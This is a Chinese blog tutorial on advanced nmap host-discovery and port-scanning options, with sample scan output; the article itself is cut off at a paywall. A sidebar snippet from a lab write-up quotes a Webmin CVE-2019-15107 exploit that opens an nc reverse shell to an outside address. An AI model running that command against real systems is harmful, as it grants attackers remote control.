nmap命令-----高级用法

最新推荐文章于 2024-06-17 16:05:23 发布
最新推荐文章于 2024-06-17 16:05:23 发布
阅读量1.2k 收藏 4
点赞数
文章标签: 安全 nmap linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lvwuwei/article/details/105898649
版权
本文详细介绍了Nmap命令的高级用法,包括主机探测(-sP, -sn, -sA)和端口扫描(-sS, -sT, -sU, -sF, -sX, -sN, -sW)等,以及如何通过-n, -Pn选项绕过Ping探测。还提到了版本检测(-sV)、扫描常见端口(--top-ports)和端口比例(--port-ratio)等技巧。文章最后讨论了-N, -S, -e选项的应用,以及如何使用-iR随机选择目标,展示了Nmap在网络安全和端口扫描中的多种应用策略。" 127789900,12285525,Java ATM系统课程设计:注释详细代码实现,"['Java', '开发语言', 'Spring']
摘要由CSDN通过智能技术生成

探测主机存活常用方式
(1)-sP :进行ping扫描

打印出对ping扫描做出响应的主机,不做进一步测试(如端口扫描或者操作系统探测):
下面去扫描10.0.3.0/24这个网段的的主机
nmap -sP 10.0.3.0/24
这个命令可以用于探测局域网有哪些机器
[root@B ~]# nmap -sP 10.0.3.0/24

Starting Nmap 5.51 ( http://nmap.org ) at 2016-12-29 11:24 CST
Nmap scan report for 10.0.3.1
Host is up (0.0079s latency).
Nmap scan report for 10.0.3.2
Host is up (0.0046s latency).
Nmap scan report for 10.0.3.3
Host is up (0.0037s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 10.01 seconds

[root@B ~]#
(2) -sn:
-sn: Ping Scan - disable port scan #ping探测扫描主机, 不进行端口扫描 (测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态)
[root@B ~]# nmap -sn 10.0.1.161-166

Starting Nmap 5.51 ( http://nmap.org ) at 2016-12-29 11:25 CST
Nmap scan report for 10.0.1.161
Host is up (0.00076s latency).
MAC Address: 00:0C:29:56:DE:46 (VMware)
Nmap scan report for 10.0.1.162
Host is up.
Nmap done: 6 IP addresses (2 hosts up) scanned in 0.76 seconds
[root@B ~]#

(3)-sA
nmap 10.0.1.161 -sA (发送tcp的ack包进行探测,可以探测主机是否存活)
[root@B ~]# nmap 10.0.1.161 -sA
Starting Nmap 5.51 ( http://nmap.org ) at 2016-12-29 13:55 CST
Nmap scan report for 10.0.1.161
Host is up (0.00030s latency).
All 1000 scanned ports on 10.0.1.161 are unfiltered
MAC Address: 00:0C:29:56:DE:46 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds
[root@B ~]# nmap 10.0.1.166 -sA

Starting Nmap 5.51 ( http://nmap.org ) at 2016-12-29 13:55 CST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 0.51 seconds
[root@B ~]#

端口扫描的高级用法 
(1) -sS :半开放扫描(非3次握手的tcp扫描)
使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快,效率高
(一个完整的tcp连接需要3次握手,而-sS选项不需要3次握手)
Tcp SYN Scan (sS) 它被称为半开放扫描
优点:Nmap发送SYN包到远程主机,但是它不会产生任何会话,目标主机几乎不会把连接记入系统日志。(防止对方判断为扫描攻击),扫描速度快,效率高,在工作中使用频率最高
缺点:它需要root/administrator权限执行
命令如下

nmap -sS 10.0.1.161
  [root@B ~]# nmap -sS 10.0.1.161

Starting Nmap 5.51 ( http://nmap.org ) at 2016-12-29 11:38 CST
Nmap scan report for 10.0.1.161
Host is up (0.00028s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
873/tcp open rsync
7777/tcp open cbt
8888/tcp open sun-answerbook
MAC Address: 00:0C:29:56:DE:46 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.31 seconds
[root@B ~]#

(2) sT:3次握手方式tcp的扫描
Tcp connect() scan (sT)和上面的Tcp SYN 对应,TCP connect()扫描就是默认的扫描模式.
不同于Tcp SYN扫描,Tcp connect()扫描需要完成三次握手,并且要求调用系统的connect().
优点:你勿需root权限。普通用户也可以使用。
缺点:这种扫描很容易被检测到,在目标主机的日志中会记录大批的连接请求以及错误信息,由于它要完成3次握手,效率低,速度慢,建议使用-sS
nmap -sT 10.0.1.161等同于 nmap 10.0.1.161
[root@B ~]# nmap -sT 10.0.1.161

Starting Nmap 5.51 ( http://nmap.org ) at 2016-12-29 11:40 CST
Nmap scan report for 10.0.1.161
Host is up (0.00048s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
873/tcp open rsync
7777/tcp open cbt
8888/tcp open sun-answerbook
MAC Address: 00:0C:29:56:DE:46 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
[root@B ~]#

(3)sU:udp端口的扫描

Udp scan(sU) 顾名思义,这种扫描技术用来寻找目标主机打开的UDP端口.它不需要发送任何的SYN包,因为这种技术是针对UDP端口的。UDP扫描发送UDP数据包到目标主机,并等待响应,
如果返回ICMP不可达的错误消息,说明端口是关闭的,如果得到正确的适当的回应,说明端口是开放的.udp端口扫描速度比较慢

nmap -sU 10.0.1.161

(4)sF:也是tcp的扫描一种,发送一个FIN标志的数据包
FIN scan(sF)
有时候TcpSYN扫描不是最佳的扫描模式,因为有防火墙的存在.目标主机有时候可能有IDS和IPS系统的存在,防火墙会阻止掉SYN数据包。发送一个设置了FIN标志的数据包并不需要完成TCP的握手.
和sS扫描效果差不多,比sT速度快
[root@B ~]# nmap -sF 10.0.1.161

Starting Nma

最低0.47元/天 解锁文章
lvwuwei
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Nmap食用手册
qq_42378173的博客
01-02 2876
nmap
查看centos7系统端口状态
caiyiii的专栏
10-28 1180
1. 可用使用工具nmap看ip 端口是否打开 nmap -Pn -p 80,443 45.76.204.75 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-27 23:04 EDT Nmap scan report for 45.76.204.75.vultr.com (45.76.204.75) Host is up (0.20s la...
如何使用 NMAP 命令进行网络扫描
最新发布
2301_79977730的博客
06-17 912
Nmap(“Network Mapper”)是一个免费的开源(许可)实用程序,用于网络发现和安全审计。许多系统和网络管理员还发现它对网络清单、管理服务升级计划以及监控主机或服务正常运行时间等任务很有用。Nmap 以新颖的方式使用原始 IP 数据包来确定网络上可用的主机、这些主机提供的服务(应用程序名称和版本)、它们运行的操作系统(和操作系统版本)、数据包过滤器/防火墙的类型正在使用,以及许多其他特性。它旨在快速扫描大型网络,但对单个主机也能正常工作。
5_计算机网络_iptables-传输层-TCP/UDP-三次握手/四次断开-内核参数调优
hj的博客
04-05 2214
1、iptables iptables 是一个防火墙工具 [root@slave-mysql ~]# iptables -I INPUT -s 192.168.0.237 -p icmp --icmp-type 8 -j ACCEPT [root@slave-mysql ~]# iptables -F 清除防火墙规则 [root@slave-mysql ~]# iptables -L 查看防火墙规则 2、传输层 又名 四层负载均衡; 作用: IP层提供点到点的连接 (网络层) 传输层提供端到端的连接
NEZUKO: 1——202201152003
32bin的博客
01-24 2789
echo -n "Testing for RCE (CVE-2019-15107) on $URI: "; curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/bash 192.168.219.177 4444&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content
HTB_Responder 综合靶机 菜菜被虐现场实录
网络安全学习
04-26 4425
今天的练习有一点苦恼,啥都不会 😭😭😭😭 文章目录信息收集修改 host 进入网站查看网站功能探测漏洞-文件包含利用 SMB 窃取 NTLM hashNTLM 碰撞获取可用账号密码获取 shell后放答案 信息收集 拿到靶机日常扫描不用说了,-A 竟然什么都没扫描到 ┌──(root💀kali)-[~] └─# nmap -A -T4 10.129.95.234 All 1000 scanned ports on bogon (10.129.95.234) are in ignored states. .
Nmap使用技巧总结-
04-01
本文将详细介绍NMap的一些常用命令和技巧,帮助用户快速掌握其使用方法。 **一、主机发现** 主机发现是NMap的一项基本功能,它允许用户找出网络中的活跃设备。以下是一些常用的扫描类型: 1. **全面扫描/综合扫描...
nmap-7.91-setup.zip
12-23
本篇文章将详细介绍Nmap在Windows环境中的使用方法及其核心知识点。 一、Nmap的基本功能 1. **主机发现**:Nmap通过发送特定的数据包到目标网络,分析响应来确定网络上活跃的主机。它可以探测到在线与离线的设备,...
nmap-7.92-1.x86-64.rpm
08-31
在实际使用中,管理员可以通过命令行界面来调用Nmap,指定目标主机或网络,选择扫描方法,以及配置其他参数。例如,以下命令将对一个IP地址执行SSH服务的详细扫描: ``` nmap -sV -p 22 --script ssh-audit ``` ...
nmap-master.zip.zip
04-07
nmap网络扫描利器详解》 nmap,全称Network Mapper,是一款强大的网络扫描工具,主要用于探测网络上的主机状态,识别操作系统...对于更多nmap高级功能和用法,可以通过其官方文档和GitHub上的资源进一步学习。
X-Scan v3.1
10-22
网络适配器” - 选择适当的网络适配器以便WinPCap驱动过滤相应的数据报,否则可能会漏报由WinPCap驱动接收数据的NASL脚本检测结果,也会影响采用NMAP的方法识别目标操作系统的结果。对于拨号用户,应当选择“\...
[译]nmap绕过防火墙
iteye_16188的博客
10-17 4909
原文地址:http://resources.infosecinstitute.com/nmap-evade-firewall-scripting/ [color=blue]TCP ACK Scan (-sA)[/color] 发送ACK数据报比发送SYN数据包更好,因为如果远端主机存在主动防火墙,那么由于防火墙对于ACK数据报不产生log,因为防火墙把ACK数据包当成SYN数据包的应答。TCP...
NMAP
qq_44228793的博客
11-27 727
NMAP nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。 正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。 Nmap 常被跟评估系统漏洞软件Nessus 混
网络安全kali渗透学习 web渗透入门 NAMP高级使用技巧和如何进行漏洞挖掘
xueshenlaila的博客
02-18 1443
nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。 nmap支持很多扫描技术,例如:UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和null扫描。还可以探测操作系统类型。 这篇文章教大家使用NMAP的技巧和如何进行漏洞扫描 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公
nginx禁用3DES和DES弱加密算法,保证SSL证书安全
Cookie_1030的专栏
07-05 7544
nginx禁用3DES和DES弱加密算法,保证SSL证书安全
nmap 基础操作
weixin_41204736的博客
03-13 7127
nmap 主要功能: 主机探测 端口扫描 版本检测 系统检测 支持探测脚本的编写 nmap 实际应用场合 通过对设备或或者防火墙的探测来审计它的安全性 探测目标主机所开放的端口 通过识别新的服务器审计网络安全性   探测网络上的主机   使用 ping scan 只进行主机发现,不进行端口扫描 #nmap -sn <target> 例1、 (ics) p...
centos7下ssh登陆加固方案
wangli的博客
05-12 2751
因为网络安全问题,需要对centos7下的ssh服务进行安全加固,下面会给出详细操作步骤及思路。      由于centos7系统默认安装启用了系统高级防火墙,ssh服务默认开启是22端口,如果直接在ssh的配置文件中对监听端口进行更改,重启sshd服务后不会成功,提示无法绑定端口,所以要修改ssh的端口,需要首先修改系统防火墙配置     一、ssh登陆端口修改         1
Nessus漏洞扫描教程之使用Nmap工具扫描识别指纹
大学霸__IT达人
07-13 9271
Nessus漏洞扫描教程之使用Nmap工具扫描识别指纹
kali nmap用法
05-10
以下是一些常用的 nmap 命令: 1. 基本命令 扫描主机: ``` nmap 地址> ``` 扫描主机及其对应的主机名: ``` nmap -sL 地址> ``` 扫描某个 IP 地址段: ``` nmap <起始IP地址>-<结束IP地址> ``` 2. 指定端口...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值